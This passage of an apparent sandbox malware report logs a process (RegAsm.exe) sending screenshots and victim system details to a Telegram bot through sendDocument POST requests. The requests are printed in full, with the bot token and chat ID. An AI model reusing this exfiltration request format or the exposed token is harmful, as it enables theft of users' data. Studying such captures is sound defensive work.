91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:26:35 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:26:35 UTC1355OUTData Raw: d4 9e ff 00 8d 61 d1 45 00 14 51 45 30 0a d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 59 14 52 03 4e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 28 a0 02 8a 28 a0 02 ba e9 bc 63 15 cc 71 24 b6 8f 1f 96 b8 05 58 36 7f 96 3a 57 23 45 24 97 3a 9f 55 b0 3d 62 e3 d1 9d 94 de 36 86 78 bc a6 d3 4c 40 f5 75 90 31 fc b0 3f 9d 67 eb 3e 25 5d 47 48 5d 39 2d 99 55 5c 38 91 9b 93 8c f6 c7 bf ad 73 b4 56 71 a3 08 c5 41 2d 13 bf 5d ca 73 6e 5c dd 6d 60 a2 8a 2b 52 42 b7 b4 ad 59 04 4b 04 ed b1 97 85 6f 51 58 34 54 ca 2a 4a cc 89 c1 4d 59 9e 99 a6 ea 77 77 2d b5 ef 36 c0 83 2f 21 da 0e 3d 37 75 fd 6b 2b c5 5e 27 82 4b 57 b0 b0 90 48 64 18 92 45 e8 07 a0 f5 ae 22 8a e4 78 35 3a aa a5 47 7b 6c
                                              Data Ascii: aEQE0>qu,y_'8QYRN]ryO>h%,$C((cq$X6:W#E$:U=b6xL@u1?g>%]GH]9-U\8sVqA-]sn\m`+RBYKoQX4T*JMYww-6/!=7uk+^'KWHdE"x5:G{l
                                              2024-05-23 18:26:35 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 39 30 36 33 30 65 38 33 35 39 39 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcb90630e83599--
                                              2024-05-23 18:26:35 UTC1497INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:26:35 GMT
                                              Content-Type: application/json
                                              Content-Length: 1108
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":271,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488795,"document":{"file_name":"user-715575 2024-08-10 06-32-22.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEPZk-KW4jL_c1XXp1WvUEOSWx_rbIAAsUTAALx64FSoyAAAfwQmV7eAQAHbQADNQQ","file_unique_id":"AQADxRMAAvHrgVJy","file_size":12368,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEPZk-KW4jL_c1XXp1WvUEOSWx_rbIAAsUTAALx64FSoyAAAfwQmV7eAQAHbQADNQQ","file_unique_id":"AQADxRMAAvHrgVJy","file_size":12368,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBD2ZPiluIy_3NV16dVr1BDklsf62yAALFEwAC8euBUqMgAAH8EJle3jUE","file_unique_id":"AgADxRMAAvHrgVI","file_size":66312},"caption":"New SC Recovered!\n\nTime: 08/10/2024 06:22:20\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP A [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.749735149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:36 UTC238OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcbb11fbe5cf9b
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              2024-05-23 18:26:36 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:26:36 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 62 31 31 66 62 65 35 63 66 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 62 31 31 66 62 65 35 63 66 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 32 2f 32 30 32 34 20 32 30 3a 35 31 3a 34 37 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcbb11fbe5cf9bContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcbb11fbe5cf9bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 08/12/2024 20:51:47User
                                              2024-05-23 18:26:36 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:26:36 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:26:36 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:26:36 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:26:36 UTC1355OUTData Raw: d4 9e ff 00 8d 61 d1 45 00 14 51 45 30 0a d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 59 14 52 03 4e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 28 a0 02 8a 28 a0 02 ba e9 bc 63 15 cc 71 24 b6 8f 1f 96 b8 05 58 36 7f 96 3a 57 23 45 24 97 3a 9f 55 b0 3d 62 e3 d1 9d 94 de 36 86 78 bc a6 d3 4c 40 f5 75 90 31 fc b0 3f 9d 67 eb 3e 25 5d 47 48 5d 39 2d 99 55 5c 38 91 9b 93 8c f6 c7 bf ad 73 b4 56 71 a3 08 c5 41 2d 13 bf 5d ca 73 6e 5c dd 6d 60 a2 8a 2b 52 42 b7 b4 ad 59 04 4b 04 ed b1 97 85 6f 51 58 34 54 ca 2a 4a cc 89 c1 4d 59 9e 99 a6 ea 77 77 2d b5 ef 36 c0 83 2f 21 da 0e 3d 37 75 fd 6b 2b c5 5e 27 82 4b 57 b0 b0 90 48 64 18 92 45 e8 07 a0 f5 ae 22 8a e4 78 35 3a aa a5 47 7b 6c
                                              Data Ascii: aEQE0>qu,y_'8QYRN]ryO>h%,$C((cq$X6:W#E$:U=b6xL@u1?g>%]GH]9-U\8sVqA-]sn\m`+RBYKoQX4T*JMYww-6/!=7uk+^'KWHdE"x5:G{l
                                              2024-05-23 18:26:36 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 62 31 31 66 62 65 35 63 66 39 62 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcbb11fbe5cf9b--
                                              2024-05-23 18:26:36 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:26:36 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":272,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488796,"document":{"file_name":"user-715575 2024-08-12 21-01-49.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEQZk-KXD6aYo_owUL7SmSDD0uKcG0AAsYTAALx64FSr0ZgFiYkUaUBAAdtAAM1BA","file_unique_id":"AQADxhMAAvHrgVJy","file_size":12368,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEQZk-KXD6aYo_owUL7SmSDD0uKcG0AAsYTAALx64FSr0ZgFiYkUaUBAAdtAAM1BA","file_unique_id":"AQADxhMAAvHrgVJy","file_size":12368,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBEGZPilw-mmKP6MFC-0pkgw9LinBtAALGEwAC8euBUq9GYBYmJFGlNQQ","file_unique_id":"AgADxhMAAvHrgVI","file_size":66312},"caption":"New SC Recovered!\n\nTime: 08/12/2024 20:51:47\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.749736149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:36 UTC238OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcbd1cc2b54c1f
                                              Host: api.telegram.org
                                              Content-Length: 71868
                                              Expect: 100-continue
                                              2024-05-23 18:26:37 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 31 63 63 32 62 35 34 63 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 31 63 63 32 62 35 34 63 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 35 2f 32 30 32 34 20 31 31 3a 30 34 3a 30 30 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcbd1cc2b54c1fContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcbd1cc2b54c1fContent-Disposition: form-data; name="caption"New SC Recovered!Time: 08/15/2024 11:04:00User
                                              2024-05-23 18:26:37 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:26:37 UTC16355OUTData Raw: 1e 66 fc fc d8 ce 7f d9 c6 2a 5f 26 3d a4 6c 18 34 df b2 c1 ff 00 3c c5 70 2c 24 93 ba 91 e9 bc 74 5a b3 8e c4 56 17 f2 4c 16 4d 9a 7a 1f b5 91 72 26 11 ae 20 00 6d d8 0f 5f e2 fb bf 36 71 ed 4d b5 bc 51 61 65 26 6c cd aa 41 71 e7 09 19 0c ea 77 c8 63 50 09 dc 0f 23 ee fa f3 c6 2a 73 6d 01 c6 63 5e 29 3e c9 6f ff 00 3c 96 a5 e0 a4 fe d1 aa cc 60 be c0 f8 b5 08 20 83 4e 91 a5 b5 2e 97 36 cd e6 ee 88 b1 53 9f 33 28 17 72 ed ce 32 c4 9c 8c 8c 53 2d 8c c4 ca 67 31 19 0b 9c 98 76 6c f6 c6 cf 97 f2 a3 ec 96 f9 cf 92 b5 2a 22 a0 c2 8c 0a da 8e 1e 50 9f 3b 77 39 f1 18 b8 d5 a6 a9 c6 36 d8 5a 28 a2 ba ce 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 4a 00 5a 4a 5a 4a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 06 14 51 45 00 14 94 b4 94 00 51 45 14
                                              Data Ascii: f*_&=l4<p,$tZVLMzr& m_6qMQae&lAqwcP#*smc^)>o<` N.6S3(r2S-g1vl*"P;w96Z(((((JZJZJ((((QEQE
                                              2024-05-23 18:26:37 UTC16355OUTData Raw: 6b b6 66 f7 5a ba b9 8a 40 52 47 ca 9c 76 af 1e 54 1c dd a9 c4 f7 2a ce 94 21 79 5b 73 9c 06 46 23 7e 38 f4 a9 43 30 e0 12 2a ff 00 f6 54 9f df 1f 95 1f d9 52 7f 7c 7e 54 be a7 5b f9 7f 23 9b eb 34 7b 94 37 b7 f7 8f e7 5a 5a 31 25 a5 c9 27 81 fd 69 9f d9 52 7f 7c 7e 55 72 c2 cd ad b7 96 6c 96 c5 6f 85 c3 55 85 55 29 2d 0c 31 15 e9 ca 9b 51 7a 96 e8 a5 c5 18 af 64 f2 84 a2 8a 28 03 b6 b6 75 7b 68 d9 18 30 da 39 15 72 1f 20 be e5 09 e7 6d c1 38 f9 b1 fc f1 5c 45 8d fc d6 52 65 0e e4 3f 79 0f 43 56 17 5b bb 49 5b 25 65 88 b1 2a 92 8c e0 7d 6b e7 e3 96 54 a7 52 56 d5 74 3e 91 66 b4 a5 4e 3c ca cc ea af a1 86 e2 d6 78 67 50 d1 b3 00 c0 fe 15 1e a5 b7 fb 1e e4 2f 41 11 03 f2 ac 59 75 f4 7d 3e 58 e2 49 21 b8 62 0a 92 db c6 72 3b 9f 61 54 64 d6 ef a5 b6 92 09 1d
                                              Data Ascii: kfZ@RGvT*!y[sF#~8C0*TR|~T[#4{7ZZ1%'iR|~UrloUU)-1Qzd(u{h09r m8\ERe?yCV[I[%e*}kTRVt>fN<xgP/AYu}>XI!br;aTd
                                              2024-05-23 18:26:37 UTC15447OUTData Raw: a4 cd 25 14 05 85 c9 a2 92 8a 06 14 51 45 00 14 94 51 40 05 14 51 40 05 14 51 40 c2 92 96 92 80 0a 28 a2 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 49 40 05 14 51 40 05 14 51 40 c2 8a 28 a0 04 a2 8a 28 00 a2 8a 28 18 52 51 45 00 14 51 45 30 0a 4a 5a 4a 00 28 a2 8a 06 25 14 51 40 05 14 51 40 09 45 14 50 30 a2 8a 4a 06 14 51 45 00 14 94 b4 86 80 0a 28 a2 81 85 25 2d 25 00 14 51 45 00 14 94 51 40 c2 8a 28 a6 01 45 14 50 02 51 45 14 80 28 a2 8a 06 25 14 51 4c 60 68 a2 8a 00 4a 28 a2 80 0a 4a 28 a0 61 45 14 50 02 51 45 14 0c 29 29 73 4d a0 05 a2 92 8a 76 1d 82 8c d2 52 64 0e f4 ec 3b 0b 9a 29 9b bd 05 21 62 68 1d 87 92 07 7a 69 61 4c a2 8b 94 90 a5 8f 4a 6d 14 51 71 d8 0d 25 2d 25 21 85 27 e5 46 68 a0 60 69 28 34 99 a0 61 ef 45 14 94 0c 5c d2 51 f4 a2 80 41 49 45 1d
                                              Data Ascii: %QEQ@Q@Q@((ZJQI@Q@Q@(((RQEQE0JZJ(%Q@Q@EP0JQE(%-%QEQ@(EPQE(%QL`hJ(J(aEPQE))sMvRd;)!bhziaLJmQq%-%!'Fh`i(4aE\QAIE
                                              2024-05-23 18:26:37 UTC6282OUTData Raw: 7f df 22 8f 22 1f f9 e4 9f f7 c8 a3 eb ff 00 dd fc 7f e0 07 f6 47 f7 ff 00 0f f8 27 9f d1 5e 81 e4 43 ff 00 3c 93 fe f9 14 79 10 ff 00 cf 24 ff 00 be 45 1f 5f fe ef e3 ff 00 00 3f b2 7f bf f8 7f c1 3c fe 8a f4 0f 22 1f f9 e4 9f f7 c8 a3 c8 87 fe 79 27 fd f2 28 fa ff 00 f7 7f 1f f8 01 fd 93 fd ff 00 c3 fe 09 e7 d4 57 a0 f9 10 ff 00 cf 24 ff 00 be 45 1e 44 3f f3 c9 3f ef 91 47 d7 ff 00 bb f8 ff 00 c0 0f ec 9f ef fe 1f f0 4f 3e a2 bd 07 c8 87 fe 79 27 fd f2 28 f2 21 ff 00 9e 49 ff 00 7c 8a 3e bf fd df c7 fe 00 7f 64 ff 00 7f f0 ff 00 82 79 f5 15 e8 3e 44 3f f3 c9 3f ef 91 47 91 0f fc f2 4f fb e4 51 f5 ff 00 ee fe 3f f0 03 fb 27 fb ff 00 87 fc 13 cf a8 af 41 f2 21 ff 00 9e 49 ff 00 7c 8a 3c 88 7f e7 92 7f df 22 8f af ff 00 77 f1 ff 00 80 3f ec 9f ef fe 1f f0
                                              Data Ascii: ""G'^C<y$E_?<"y'(W$ED??GO>y'(!I|>dy>D??GOQ?'A!I|<"w?
                                              2024-05-23 18:26:37 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 31 63 63 32 62 35 34 63 31 66 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcbd1cc2b54c1f--
                                              2024-05-23 18:26:37 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:26:37 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:26:37 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":273,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488797,"document":{"file_name":"user-715575 2024-08-15 11-24-00.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgERZk-KXWKHsHVfGD_CkEyZOjOi6PEAAscTAALx64FS_oVbrSYX13EBAAdtAAM1BA","file_unique_id":"AQADxxMAAvHrgVJy","file_size":13074,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgERZk-KXWKHsHVfGD_CkEyZOjOi6PEAAscTAALx64FS_oVbrSYX13EBAAdtAAM1BA","file_unique_id":"AQADxxMAAvHrgVJy","file_size":13074,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBEWZPil1ih7B1Xxg_wpBMmTozoujxAALHEwAC8euBUv6FW60mF9dxNQQ","file_unique_id":"AgADxxMAAvHrgVI","file_size":71239},"caption":"New SC Recovered!\n\nTime: 08/15/2024 11:04:00\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.749737149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:43 UTC238OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcc1491e544297
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              2024-05-23 18:26:44 UTC25INHTTP/1.1 100 Continue
